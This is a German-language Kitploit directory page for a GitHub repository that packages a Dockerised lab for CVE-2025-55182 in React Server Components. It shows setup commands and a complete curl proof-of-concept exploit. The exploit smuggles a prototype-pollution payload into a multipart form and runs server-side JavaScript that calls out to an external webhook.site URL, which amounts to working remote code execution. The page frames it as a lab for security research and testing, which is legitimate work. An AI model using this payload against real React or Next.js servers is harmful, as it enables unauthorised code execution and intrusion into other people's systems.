Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
react-cve-2025-55182-lab — Dockerisiertes Labor, das CVE-2025-55182 demonstriert, eine Schwachstelle in React Server Components, mit einem Proof-of-Concept-Exploit für Sicherheitsforschung und -tests. | Kitploit
Tools/GitHubGitHub/alexandre-briongos-wavestone/react-cve-2025-55182-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFLernen & BildungLabs & Praxis
GitHubalexandre-briongos-wavestone/react-cve-2025-55182-lab

react-cve-2025-55182-lab

Dockerisiertes Labor, das CVE-2025-55182 demonstriert, eine Schwachstelle in React Server Components, mit einem Proof-of-Concept-Exploit für Sicherheitsforschung und -tests.

Repository anzeigen
3vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Einrichtung:

root@kitploit:~
git clone https://github.com/alexandre-briongos-wavestone/react-cve-2025-55182-lab
root@kitploit:~
cd react-cve-2025-55182-lab
root@kitploit:~
sudo docker build -t react-rsc-lab .
root@kitploit:~
sudo docker run -p 3000:3000 react-rsc-lab

Exploit:

root@kitploit:~
curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: localhost:3000' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0' -H $'Next-Action: x' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad' -H $'Content-Length: 500' \
    --data-binary $'\x0d\x0a------WebKitFormBoundaryx8jO2oVc6SWP3Sad\x0d\x0aContent-Disposition: form-data; name=\"0\"\x0d\x0a\x0d\x0a{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require(\'https\').get(\'https://webhook.site/bf68bcb8-2e7a-4fa8-9108-eb1a796a4ba5\');\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\x0d\x0a------WebKitFormBoundaryx8jO2oVc6SWP3Sad\x0d\x0aContent-Disposition: form-data; name=\"1\"\x0d\x0a\x0d\x0a\"$@0\"\x0d\x0a------WebKitFormBoundaryx8jO2oVc6SWP3Sad--' \
    $'http://localhost:3000/'

Referenzen:

  • https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
Tool herunterladen